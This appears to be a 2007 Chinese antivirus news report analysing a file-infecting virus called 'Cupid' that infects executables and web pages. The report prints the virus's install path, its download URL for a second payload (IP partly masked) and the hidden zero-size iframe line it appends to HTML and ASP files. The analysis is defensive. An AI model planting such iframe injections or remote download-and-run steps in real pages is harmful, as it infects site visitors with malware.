来去无踪　小心能删除自身的病毒丘比特豆豆杀毒

来去无踪　小心能删除自身的病毒丘比特

http://kv.ddvip.com　2007年06月01日 09:44:40 　赛迪网　李铁军

　　一个网站挂了10来个马，爆强，看到IE状态栏不停闪烁的跳转，只有吃惊的份儿。

　　其中一个新病毒，毒霸管它叫丘比特，以下是详细分析报告。

　　该病毒是一个感染型病毒。该病毒会感染后缀为.exe、.scr的可执行文件和.htm、.html、.asp的脚本文件。（李俊太有才了，自熊猫后，越来越多的病毒感染网页格式的文档）

　　1、将自身拷贝到系统目录下

%SystemRoot%\system32\love.exe

　　2、该病毒将urlmon.dll拷贝一份名为ok.dll，加载并调用其导出函数URLDownloadToFileA下载并运行另一病毒，其下载路径为

http://63.223.96.***/zcx.exe

　　3、在脚本尾加

%iframe src=http://63.223.96.***/ma6.htm width=0 height=0%%/iframe%

　　4、该病毒运行后会自删除。

[责任编辑:KV_ddvip]

点击搜索更多"病毒丘比特"相关信息

正在加载评论...

请您留言

请您注意

· 遵守国家有关法律、法规，尊重网上道德，承担一切因您的行为而直接或间接引起的法律责任。
· 豆豆网拥有管理笔名和留言的一切权利。

本栏更新

·来去无踪　小心能删除自身的病毒丘比特(2007-06-01 09:43:53)
·流氓软件“广告能手”自动弹出广告窗口(2007-05-31 10:19:49)
·恐怖“维金”又出新变种　网页上传病毒(2007-05-28 08:40:13)
·新木马伪装Windows反盗版信息骗隐私(2007-05-11 15:47:17)
·小心!狡猾木马伪装成Windows激活程序(2007-05-11 15:44:52)
·小心谨慎遭新窃码病毒系统桌面将变空白(2007-04-24 21:41:09)
·首个iPod病毒出现!卡巴斯基称暂无威胁(2007-04-09 10:34:50)